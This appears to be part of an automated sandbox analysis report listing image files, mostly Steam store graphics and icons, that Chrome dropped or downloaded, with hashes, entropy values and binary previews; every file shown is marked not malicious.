        SHA-256:2DFE0D7F540BBCFFFB3FB0607C426210FDFFBC4DD76139E73DA1399584854630
        SHA-512:154127FB47A0741994921BABF6151B9586AF551BD8AC7D445C6FB90B2F533553711420206FB7738817C9A5DE64155159A707BB0D4DD7A2F6871E5246493EB7ED
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................?.........................!..1.2AQa."q.3Br......4R.#%5bs...S.................................(......................!.1.."AQ2.aq..............?....R...v.o...g..j...7.>QS.J/:....<....>.....hj.....9ZV.J.e..{....u..JJo}...zC.x.sE...A....../.....O.4<.j..Z.......-{..%.0.....iy6.A.^.#.2..O{K.|...[.vS.H4..x"\.....,u....FO%..v?...K...YU1.^(..d..l>..z.].P.[.l..sXj..DI=.&....qaEM|.&_.../.."4..E".."N..6..I....r&.....[t..)N...j.;.l.....Dm"........c.....wl...?..T....D..........Y..#.....s...H...Z..v..z.X.P:....F)..#ZFu[.5Ur.!.0.J.a..&m..^...3.+......Iy.K'....;aXs,.e9.<O....m.I<@E...eB^._3...{y.........X.e.e..VP....n......#Q.~0.....(i..|..A.b.gq.&*X..H..]z.J.J....u.V.....u.<jL.yg.+..d..F.=5\..p.c&.B....X...xq.q...>...(.=..?i49.0........~3....KI..6|*.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3433
        Entropy (8bit):7.856904024409769
        Encrypted:false
        SSDEEP:96:v0GN/ZjBwU8IilvcG7Got/8WAF0eHTPegO1NX9pCHi6j:LxZjBLiNZ7Got/8W081M
        MD5:3F6805E931482F914739F2CDFAA7C31C
        SHA1:E3394B9DE41DF496B6221C9B3A8DA8869EA1F35B
        SHA-256:9FB42C5D67CCCAB85E0B57D91BE8D61BE85B553D828DCE7677BCEEAACC102141
        SHA-512:C07E610014755FD0208FE62A34822BDD4EFEAC70BAF38911697AC4DEA5D12E3BBADB6B6206D9E635EEA633EA693E5091D34158E04D63DF55629E76E48136726F
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................;.........................!.1AQ..q."2a..#3B.....4$rDR....................................%......................!.1.A.Q"B..2q............?..".4).,qL.;.b.+...G.VX2.).~..k.,..X..8d..Q"....$hSC...m....DS.....o.R..b....qT...yFU..=]:...#U...o.[...#.J.J...rI....B..mk.......Q.Im.!(ri.......t...PR.T.p..%m...X.;a..........pe}6.A=z.dr..F.........=.s*.7]....[V..T.r..)%edYb%4...!..w'.b,n.._.k.-'.S.....=3I[QA?...."..YT.m..o.|'.+H)..D.j......9.}jZ..}'R.~...'4.HP..sJ..YX..c.. .....)...6.TS..,0...HN..lUk.....M.o...$&...C.+#i....o~.\....tzHbSgT..T....%...R.<.......-...\r..........v..W.GQ.....c .....7.+^.I...|.........1..&...\"x..I/......+.D..Ve..yPAX.......Z..0.E..+......Gp..v.\..L..h..C>eU+.........RHF.X.xj.......p...`p.T+....+.h......a..z\r.....G*...W
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:dropped
        Size (bytes):3207
        Entropy (8bit):7.823442007788021
        Encrypted:false
        SSDEEP:48:KN3AZfd89cBa7q8/N2+e5D5IPCCNfwq8cQopS/LU53pEVIVwBxrSEZuz93t:KN3AZ2CU7qRECwwR9oog53BAy
        MD5:C0FC769F185E2AC6034995D34E86ADE0
        SHA1:B34AF091C36BB1968CD925C75FBF0CEB9A95B234
        SHA-256:CF6D1155B2FA9E396E370A14664C5FA04261BB3F1979A12DE77C1910D2ED0918
        SHA-512:D247DC0634C85FF7F7C792467EC56DF70824D803F77493D31D587A4B906B2840F77CACBD374096247BE8817FEC9F936C0097C7BDFC1DEEBDA99ED7DDC3EF13DC
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................9.........................!1A.."Qa..2q......BRS#3C...$D....................................................!1A2Qaq............?...'z.h..&...h..&...h..&...h..&...h..&...h.w......~....M.0......K&n..?qP7|.. ......y....<vn....5z...j....i.u"vR.... .5,...<v>...{..MLk..g....>...8.....~\E.....<'.'....aQ[K1V....S...?....0....`.[.t.j.(...m....oU.n....k..6..+5...P.D...d..N.L.a..N[.fz.v..n.\[.......5.G......^..d{..r ..Wl.....4.o......uM'..?._.:.........I.S..Z.i..2.q~..j3.#..L5 ...*..08.2..4.K?$...j)Px.l=j.X...'..0A....0.....*..v=jc].a.D.mZb.].........ef:......(f.g`...5|}E.e...Y...]L...4iF.u....`.....x.~./.G)....../]..[R2..&.0.J.w........1K...<R.{.-.!.^..R.N.."7.k...Gh._1{.k...%.B..~`....Z..-.R..).T......YDD...h.y.XaH.aX.+^"v.LD@`?..r..~.V..j.PM..f.ME
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):9520
        Entropy (8bit):7.939104626702935
        Encrypted:false
        SSDEEP:192:EkpJA5B5xJVbJ4xoHFCwT7qZ3R8rYEVtw7TcZ:PDwBRVbJBvTsh8UEV+O
        MD5:BD532EA374E04AB7078CE194653C290E
        SHA1:A1E73F153F7458B7E5994BEBBBFCB767CAD949C2
        SHA-256:262EBE638516040E5E4D97145071BCC1B738B7AA2C2909FAE5FEC13A200AF988
        SHA-512:B3AC31CE7287B38E2D00AC7152400882E044795F29D0315135CD341EB1FD9370A968C1A6E88677BFFADE01A6EB315BE132198E6EAB16B4EC6ACB6C10D28D0E25
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/capsule_184x69.jpg?t=1714668079
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................7.........................!..1."A...#2Qaq...BR.3...b.................................2.......................!1.A.Qaq"...#2......B...b............?....../3W.VU.\...52..\........p<...W.'U....}{~...=[...w..q......s...z.]..6.. .G.. ..'.2+d..BO.....{....+....G]t.m:.4.7*w......@.3)... ...s..^....:.......z......q].....-E..$.t9VS....:.J.C..x.F.WM$3......?..U.B.=.PP...U2.M...HB...O].....~s..n......Z.6..V)..4MU5La...>.*+`.......C&l..c).../C.V.....+.....V.I...s.9...F......\.C..).t.j.N..UWO...I#9RT.........6.../1]WZ....S..3........ .G.....N9..[ [~.r..d....{=....J.Y....8...l.I..u......5]..Ti.Z.}9..S........3).[.V.D...^.OJ..:....<x9....[d.l....`..."..A(y...!.s...GU.....x-q.qU..e.br......=:....7..w..M.G...uW\...).>r........B......O...w.{`..p........w...8....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1846
        Entropy (8bit):7.365755828390777
        Encrypted:false
        SSDEEP:24:o/51he91Wwh82lYSg767V+6gT3qxyJbRW6vRW6nGPAQ4PKsSnflj0Sybz4+43Ore:o/qQvnb6706gVJbVvVnX/8NAzb/4OFjg
        MD5:574C350C7B23AE794D5276F8580E0838
        SHA1:235C7B35C3468F8915ECA01F7ABDB43D34079609
        SHA-256:8B97BA0DAC22FE6704C1F6D95FE79613F33017804F256ABB9006DF0442491787
        SHA-512:F1F2D7B6FA49E9241F2B88560127EB2871F66123C2F9DE45B257750CF13E6EBB32A9D85D87AADA6A99838A2F3C5412540065CBAB398760A50F15AAE3A759F9F7
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...\.........:.;)....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:CA2980EA1CE911E48001B5E88DFE2FC8" xmpMM:InstanceID="xmp.iid:CA2980E91CE911E48001B5E88DFE2FC8" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="022AC118D7972AA30ADDF82E49682075" stRef:documentID="022AC118D7972AA30ADDF82E49682075"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..X[H.Q...7.-.a.E.0.(."....-..z.GIA.O.}..Q.._EQP..(.0{.(z@.......Y.......v..;g.3.Y...93.Y..>{.......02..~b.X....g2..h.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1128
        Entropy (8bit):7.723345029915411
        Encrypted:false
        SSDEEP:24:BxLvMozLRF7MwIlr4GTz4Hm+zhdR3mIapBLtEijGyv0k9w2t:7Eozf7x+EGTEHmWTapB5EUJv0k9rt
        MD5:6977113832E374E987A7D8BC22C07C41
        SHA1:5FF11962D052B7206CB9C10E83645DA650028124
        SHA-256:5E3BB2AF3D3F0212D5B7306506306DBFCED035B3C3E0ED113F993C79861C3D2D
        SHA-512:EA6B3B0E17EF07EE29DFE633022165E5FD65E6FC52FB3C77448FF373A1856F45887A31C739E934E2A044B883CA8780CD84A2E18BDE074E1EEC9F8478A5EA1902
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..kH.A..g.F^HJ{.f..#..... . ..f...R.B......~(("#./.B.......b$J$E.Z..H.J|...=..z......=........9svTTUe.l>..................{..2@,..>.v.WH.<.t ..4.R...T.....L.......x.8..U.v.....E.9..*....2mp>.4...d.(..*@+.6.R..p...%Kt>.4..Y?.....@}....q....*.j)*..Q..0Ig,..@...$9.E............t......\.JX:......n.....2..D.J..P.~.j.ULt..".7...A....I..!.:.(.......i<.... ...eIv.8(.nE.Q..@'..E....b...%9>.6.c.n....4...m.......f@..=..`..fa...\.kkI..$.x...NK1P......o...N...e...lQ..1~.lr.6.....@&.H...O\$@..?.T..;......`...h.!@7}&.=..t.. X&....&QE.{.t~.4...,.v.........6.n....!?...\"@..Ip|...L.a.F..i.........0..+&...p'8.R..|?.,.dD..x..i...`?m;.b..:o6..@.M..O?..0{..d'..:.+.8oe....Lw..oA.e.Lf.p.5v^..u....y.U....1....$..M..(.....09...2.......d^w/c.I....,._CmH.tV.G{...Y..?..k.u.&..T@Y#..BQ........9[b...k..h....i.o.Q..|.(a..J.N....`5X...2.OP'h.%e...`.8..0.\^,e.)..Rl...3.k.\....D.r..o}`..........)....@..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1139
        Entropy (8bit):6.532046828421671
        Encrypted:false
        SSDEEP:24:c1hpunQWwjx82lY2T32HEVy1CaKyJ3VGFG6i5NKkNhbOlNvIP7:CitNn2VpMJ3mMTxkY
        MD5:FAC3C1AF93D191D52892FF42E66AE70B
        SHA1:A3D5AC838B61D1B8231D91C7E5492771A452110A
        SHA-256:D87DD24DE2B24AFAA384DD663A471AF4843EA35C40D5FFB325019EB458DFD8C5
        SHA-512:4AF94AF01D40D18A97DC3213E79F308E6C30B11536CC9E4BE8BBDA041F96A52C83816E0847D94A54783D829C272AE8BCB29E8231FBFDE66BA68E3EB57A7211E9
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_mac.png
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:EAD87E4B4CB311E3BF759EB643A791F7" xmpMM:DocumentID="xmp.did:EAD87E4C4CB311E3BF759EB643A791F7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EAD87E494CB311E3BF759EB643A791F7" stRef:documentID="xmp.did:EAD87E4A4CB311E3BF759EB643A791F7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..).....IDATx...?.AQ..qW.$eS.2.............l."...H,..^..BI8.r&.u...<...._...R..f.n.z..B1...4N...B=..F`Q....4.j..(!...H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):106215
        Entropy (8bit):7.975564817576758
        Encrypted:false
        SSDEEP:3072:ZCokiPuGPLhO+GLJztDrLLVvKJy+srYT78vMvi:ZjFuGk+KJpDr390ydrc78vM6
        MD5:6D414F5F0205CDF6A6510116526B34F9
        SHA1:0DBD93EA617D129C1AB2D0B3A5EE5D437E6B933B
        SHA-256:1797E38037BA9EBEE748D5B93703F3663D31BCDA85568A2009E4BCEB5E280ABF
        SHA-512:C0B7BB3A2C44E534CF04BC5F4683DFED336CC4BFE4D615F891127A9DB19B165A367A73AED555B1CD411296E52C7F7A3FFE1F352747EEAA641B5AB525D6AA15D6
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................U.........................!.1.."AQa..2q..#B..R....$3br..6s..45t......7CS.8cv...%Du..................................;......................!..1A."Qaq.2.........#.3B4R.Cbr.$..............?.....d$........<d.=...V.'t..H.2X...$.,.T.4L.Y...bq...+....^.EG.1F...9.=...WD.%...N.s....U+.!4m..)$.|......,y&x.9?.....k.E..R0c...?]XD..8.].W._..m.aUx-..l.<....2.X.N.....".[.[..|.J YC.).h*...&T.....~.q.........z....g(vDyy.,..y?............re..uoA? ._:....+...[.. ..Jzy<..%....v.....=..#...sz;...E......)(...q..~...~Y.......U.o9I....4.-|3....A....J.p9.q.j2... ....$..........0%YU...$g..VX.l.Y..-_.fw.d....{......._~...S5.=..qia.5..&.h...8....Np5...>..X&g.....$.!f~6.....<...Gb.H.5..Q..T..oL.w.A$...?............k..-L.TM..P..T.v......1.s....%..3n...Yn..)/.9`..y...#.........M'....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):56457
        Entropy (8bit):7.980487681254863
        Encrypted:false
        SSDEEP:1536:pQvpiwq4ornbgR80+JTtSWaBFhO244F9A8t:pkpiwqXM82WaLgM9jt
        MD5:1280A0B10D3B26FC866724D248DC8EB5
        SHA1:7F2CD24A39B97480FC8BBC5AAA26C36D8E23FF5C
        SHA-256:B21434C630C2EAE40B5B513EA5033FFE2A343B065167CF9466823A6327EF1BD2
        SHA-512:DF271799B0B996CF59E972C8F6E2F971A28351B1EEB01DD07F39A1568D5D65ED5B0F56C88D6A6A6122C31C522643F788C2AF1F96A06057528D8100D6E1E21860
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/3008050/ss_927a9520f04815682141ec24991e8d525221e8dd.600x338.jpg
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................Q.X............................................d.........................!"1..AQa.#2q.....$3BR......%&b..45CSTr...6DUcet....'VWs.....7EGdu.Fv......................................D.....................!..1A..Q.a..Rq........"23S.#4r..BC$%5Tb...D............?...};c......7.Q.yNC..z..g.>...v...n..........<...s=i.`..lf....I...2.m~..s=i.f].em..m..mu.b.V..-)bK:..l..p..J....p..l...t`R.mi...&..".W..|Y.!.S...=K.........8....(4.W..P.....5.,:.j1.z@d...k.2ZPo....N..T..6....k..#.._...K.3....b....:.U.86r...}.%........t...'..1...#...Q..P.=a...m.BT........].=.4.-..5.y.....&...m.~h.aIu..`V.....<..!J.Y.Mo...`.$...\..../...J.._P......5P..p.&.U4.Zf.$`i...J.[p..u.....G...Q../..y.c...U..(yi..\+.^z..25...P..R.q..{|..]..= .P.J...o...N.9yF.WC<.b.{x.z....I".q..q...j...+......qg..=!.....+5.:rO.....B..-i.=bi@&...k^H..II&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, interlaced
        Category:downloaded
        Size (bytes):1360
        Entropy (8bit):6.773253103418387
        Encrypted:false
        SSDEEP:24:+y1he91Wwjx82lY2T3ouVGcUWSdoyJ3Vblt3bGlH0MMRsimfvlw:+wqQNn2xhJSdrJ3Flhb/Mimfvi
        MD5:F80E8AD0C744077C189C95726A41A13F
        SHA1:2220CF2E998ED605B974BD0088524832CE896D3A
        SHA-256:DF56BAE04E49BFA572E00837B378194D95530FA915EDF5ADC76E09E0E8F4AB13
        SHA-512:EFA8EF646F517896D597129D167767537D7D00315070230BD6988D85E585433FF321B3504CE1DA3518FB8B4C014797C76F329BDFAB10A060E097A53067BBE7A9
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_linux_dark.png
        Preview:.PNG........IHDR...............-.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AA4360FFA29F11E6BD31A92153A0CB29" xmpMM:DocumentID="xmp.did:AA436100A29F11E6BD31A92153A0CB29"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA4360FDA29F11E6BD31A92153A0CB29" stRef:documentID="xmp.did:AA4360FEA29F11E6BD31A92153A0CB29"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..c.....IDATx.b...?.....FFF...L.... ......q.@...b...9.....PAv ..J... .C......(.....b{.d...pg@..C.... ...0...@......,d9
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7363
        Entropy (8bit):7.917835636055964
        Encrypted:false
        SSDEEP:192:oNQ97XWou+rquyq49wz8uYiK83v79Uc2PlaOVd:oNqm5+rM1w4jiK83v79MFd
        MD5:4F672C7801089268FA2C9E105A654805
        SHA1:E9946A32BCA300E756EED31E98098982E5DF4D7E
        SHA-256:4FECC949DB57298EE409C2B19DC67DCE6C1627C4551688633F3C68F40999564D
        SHA-512:F493AED94437026F1E4F2ACAE5E2DBC750AA8D81FFE7D5AACB1CAAAE3A333A84F75E4AA60CC8FD2BE32BBFE851A93B29BCD1142E105BF3693FD4DB732BF24370
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1091500/capsule_184x69.jpg?t=1715334241
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!.1.A."2Qa...#BW....$3Rbq...Gr.......................................@........................!1..AQa."q...2R....BT....#3b..r...Ccs.............?..q..]...R......)FaJXR.R....)GhR....)D)K.R.R....)aJ!JC.Q..Q.Q.Q.Q.Q.R`.R.U...zY35Z..2]j.K...)D..* .H.."2X.~.E. ..BA$y.T)iG.b.F1..T......C..&..;...L.*A......=......BB|.l+...[..L.f:.d..Rj..%...AR6..Qe..).N.....7z.)>`..|.8..n........V......1.@&f..kh-.O....N"...R.R..B.......$)D)D)A.)..=....R.B...*...m.9..X.+.4.kc....i'...H$...{.<-.YS.<.'..y...:.........f..[=<YS7$.....-.i.[.O.x.G...w<;.....;Yt.Z.d..M.'..5..c....%K<....u0).>N.51R..e.....u.I:.J6...ai$..B;p#9~.p..^..xz{..Gp..0$.U....6..%W.......`OH...v...k.....0....%..f......p..Q.....\.W..h6.{...@.u.s.&I....A...8....E...4..\.....51..feJ
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):73624
        Entropy (8bit):7.980918433419721
        Encrypted:false
        SSDEEP:1536:q5vduvMscdXEQCFbW/d5fwUPmAQUtrgjr8RqGGdwdcFuY7:q5vCtFEw+QUtkkRqGHyF37
        MD5:B291EA7B31C1DB3680823B10F89D02AF
        SHA1:2C0FB35553A013A6BEFD07FBB0C115214C2B2703
        SHA-256:F35ADB225FC1B198CE52FF23D4E3E07DD45460E8032A642BAC5B6857E94809FA
        SHA-512:19004A6E5D3D57D619CE13D93FF1568B5E64B1C619D8AE86AA9EA816475C27A6826B09B401B9CCF524092EB301BDC87061DCF6E1FCA488F883D6C673FB794FAB
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/ss_796601d9d67faf53486eeb26d0724347cea67ddc.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................P.........................!.1A.."Qaq.2..#....BR..3b..$Cr.4....S...%cs..5DETd...................................;........................!1A."Q.2qa.B....#3....R.4br..5CS.............?..*~.8:..y._.....Q....L....z)d....y0..`o........]'.....A.........u.2.........6.$7\Y....)......p...IQ^.y.q.....!..f_.UmD..{cKH...Z......5.>.....'.2............R..AQspz....=.....x..^.J.,.(e.@.S[^..r.^8.:m...c}.G6U...P.Q.:l.,...#+..4H..Ab......0m..|b.D..f..A....iU-./$$.P..,@.W....1>(.%.c!..om..8.~...7m.)..vG@.....s...t.]..Y.d.$........u..{...U........8.%..2.<...YB..h....65..3.y)..kO#..r..'I..b......|.`.....Y.y..vk.LT..+..@.6.q..!...|r8.....J.=4....b.a.......c.,G.o...f....d<.['..:?.Q.........R.....7U,..Qj.h........sM:..c.1..g.-U..O v...lT.rE..E....f.*.5.0...B....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1328
        Entropy (8bit):6.880420597007017
        Encrypted:false
        SSDEEP:24:Gy1he91Wwjx82lY2T3ouVu5iyJ3VoijGTiesAaQW4EE9MFeEP:GwqQNn2xUJ3X9xP
        MD5:A05473892F605253A637C9E21842C6EA
        SHA1:29A2C7E5280141017572A51C3A453F09C196A170
        SHA-256:8721F5B77F1F3385DA250A584907545283BC2C474CDF0281C3EC7D48D28BCD21
        SHA-512:F5CA853AC7C196F1CF843C30CD5392A9A532B9A285486ED79FB1A4763BACA7AA6B1826E386CB9DAD0F5A29958A9E8144E32E07A8793EE6FA5A4B6DF8E1B9CC79
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4EF25EF3C36011E7BE0ABFBDCAC69B75" xmpMM:DocumentID="xmp.did:4EF25EF4C36011E7BE0ABFBDCAC69B75"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4EF25EF1C36011E7BE0ABFBDCAC69B75" stRef:documentID="xmp.did:4EF25EF2C36011E7BE0ABFBDCAC69B75"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%^......IDATx..=K.@..7.....X.... X\!..Y\.. .U..A;....h!Z....6.a#..`c......(.Y..$....8.....L&B`........f{..2.....C..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):74830
        Entropy (8bit):7.978409345346979
        Encrypted:false
        SSDEEP:1536:pA9mF5FdcULbma7zLUUIMyC8eUcJzcnTsiBXCPlEba0GUNEPEJgWKow:pAAFdHLSwwUIMyC8eFmRBXJaPPNWKP
        MD5:7C49483375E9AA71301675F1F42040B3
        SHA1:17A2D56F86007B7735B7C70A080C6505E2058380
        SHA-256:18B6FA95DD2A317BEA2AAC2E27ECCCC8A842DEAF0B5ABEAF45DDB42358554F1A
        SHA-512:DA77CE6B977216DA7ECEF36C269D532745480E65FD160D2563BEAE4BDB238859625C3ECEC9002105015C41A8BC714BB4E879A41B13D1A41C8ADB27C7E653B2F5
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................[.........................!.1..A.."Qa2q...#B....3Rr...$4b..5Cs....67Sc...%tu.T.&8Ddv......................................<......................!..1A."Qaq.2........#B..3R.b.$Cr.4S.............?../...c-....z.0.?.7.K:....#.>aT.UWH...;.......=.j...'.....V.}.`....o..p..4sj#.mi. ....Is......4g.#$.+......<.a..#X..;.p.......:......qTH.D.%..0#.....u.6'e.#......]...8x....+.;._J*..NzU......-v.1....,%.Ym..8?#.(...Va$M.(...G.u..K.??eb.T..:..?uS.......<.......J......k\...>?E>.w..u.u..!..k#.{0B..".-r......G..w.?x_..8O.).m..8........TT... o2h..p......P[M...$[.Zvo.p.'....V......3QQS............'#....@...R(n.*.GX`^.....+..-@.!q7..*<@.Y....\.......I2.....G.s.*....*.t.@NDJ.R~^..5.f..F.....;..<..0......~.....E$......./...Y...o....gn...O....y....b1Io.<...\.$
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:dropped
        Size (bytes):3684
        Entropy (8bit):4.780503743341751
        Encrypted:false
        SSDEEP:96:CXQSfzclE2Bc4N/waCVAh+m8CE2n1HNBRjVO2PGPLYOgzypH6YB:WQAzSE2BB9/c1CEEtoFUOgzs6YB
        MD5:B7A7E43284E2FFE806AC1BC27C1F6A87
        SHA1:E8196489E2AE99EC6EB33995B5A3E108D6E44DE0
        SHA-256:C3A7C646A1305017F22423030CB5A12ACC9F96B64013DCEF7AEB80567B542CBB
        SHA-512:757E4F382A864CAC9F975220C28586F5EA415B2E2215375C1A47E011A9190FCD15313D399007539F150A6DF0378B8F2022AC88E995693AB03A9F5656BFE40832
        Malicious:false
        Reputation:low
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="355.666px" height="89.333px" viewBox="0 0 355.666 89.333" enable-background="new 0 0 355.666 89.333"... xml:space="preserve">..<g>...<path fill="#C5C3C0" d="M44.238,0.601C21,0.601,1.963,18.519,0.154,41.29l23.71,9.803c2.009-1.374,4.436-2.179,7.047-2.179....c0.234,0,0.467,0.008,0.698,0.021l10.544-15.283c0-0.073-0.001-0.144-0.001-0.216c0-9.199,7.483-16.683,16.683-16.683....c9.199,0,16.682,7.484,16.682,16.683c0,9.199-7.483,16.684-16.682,16.684c-0.127,0-0.253-0.003-0.379-0.006l-15.038,10.73....c0.008,0.195,0.015,0.394,0.015,0.592c0,6.906-5.617,12.522-12.522,12.522c-6.061,0-11.129-4.326-12.277-10.055L1.678,56.893....c5.25,18.5
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):3133
        Entropy (8bit):7.878926440205633
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODVxj1yWJ:VSDZ/I09Da01l+gmkyTt6Hk8nTjjTJ
        MD5:2369B839B9785EF55718452E674A45C6
        SHA1:EBB0C36D260C53308855DA5B3B7D38B1F767D84B
        SHA-256:CDECCEA3FFAFE66820780DD41F2231E99976467FA8363481F16D91C4B8435739
